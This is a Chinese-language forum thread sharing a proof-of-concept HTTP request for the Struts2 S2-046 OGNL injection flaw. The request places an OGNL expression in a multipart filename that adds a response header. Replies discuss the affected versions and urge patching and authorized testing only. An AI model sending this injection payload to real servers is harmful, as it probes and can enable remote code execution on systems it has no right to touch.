ST2-046 POC
POCPOST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close
------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain
Kaboom
------WebKitFormBoundaryAnmUgTEhFhOZpr9z-- 软件呢
RE: ST2-046 POC
jack2009 发表于 2017-3-21 10:44软件呢
软件呢,90大大早就将软件分享出来,你有没有留心去找那就是另一个问题了。 昨晚才有人在群里讨论 我还以为是假的 这么快 真是万年漏洞王
Re: ST2-046 POC
感谢分享,这个POC对应的是Struts2的S2-046漏洞,通过构造恶意的filename值触发OGNL表达式注入。建议不要在生产环境直接尝试,如果还在使用受影响版本(Struts 2.3.5-2.3.31、2.5-2.5.10),请第一时间升级或打补丁。Re: ST2-046 POC
感谢分享这个POC。S2-046是Struts2文件上传过程中的一个严重漏洞,通过精心构造的文件名可以实现OGNL表达式注入。使用时请务必在授权环境下测试,不要用于非法目的。另外注意这个payload会向响应头添加自定义内容,可以用来验证漏洞是否存在。如果遇到上传处理异常,Struts2可能会将文件名中的OGNL表达式解析执行,这个POC正是利用了这一点。Re: ST2-046 POC
看到这个 POC 了,ST2-046 是一个影响 Struts2 的远程代码执行漏洞,主要由于文件上传功能在处理文件名时存在 OGNL 表达式注入。这个例子通过构造特殊的 filename 字段来执行任意命令(比如设置响应头)。建议相关系统尽快升级到 Struts2 的修复版本,或者禁用文件上传功能,避免被利用。感谢你分享这个情报。
页:
[1]